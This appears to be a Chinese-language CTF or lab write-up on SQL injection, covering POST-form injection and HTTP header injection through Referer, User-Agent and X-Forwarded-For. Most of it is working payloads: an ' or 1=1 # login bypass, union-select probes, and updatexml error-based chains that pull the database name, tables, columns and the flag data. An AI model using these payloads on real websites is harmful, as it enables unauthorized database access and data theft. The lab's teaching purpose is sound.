POST注入与Head注入
POST注入
post注入与get注入的区别在于表单的传递方式,无本质差别
get传参通过url编码,使用?来标识,数据量有限
post注入一般对输入框进行传参,数据量比较大
-
查询是否有注入点
对输入框填入一些闭合的符号,看页面是否异常
例如: ’ " ') ") -
尝试使用万能密码
admin或123465或 ’ or 1=1 #
-
post注入
' or 1=1 order by 1 ' or 1=2 union select 1,2,3#
接下来的步骤与get注入类似
Head注入
-
报错注入原理
登录成功后通过brup抓包,将标记字段中的内容替换为updatexml函数,通过sql报错来显示我们要查询的内容
updatexml() 更新xml文档的函数
#号前闭合,后注释
用and的时候,前面的错了,则后面的不执行;前面的对了,则后面的执行;
用or的时候,前面的对了,则后面的不执行;前面的错了,则后面的执行;
sql语句在concat中可以被执行,16进制也能自动转义 0x7e为~符号 在upxml函数中加入特殊符号使其报错
可能的注入点 referer: user-agent: x-forwarded-for
- 登录成功后抓包
由此判断存在head注入,并且insert into 可能有两个字段
-
通过updatexml函数获取库名
updatexml(123,concat('~',(select database())),123) 'or updatexml(1,concat(0x7e,(select database())),1),1)#
-
查询表名
' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.columns where table_schema=database())),1),1) #
-
查询字段名
' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’flag_head’)),1),1) #
-
查询数据拿到flag
' or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #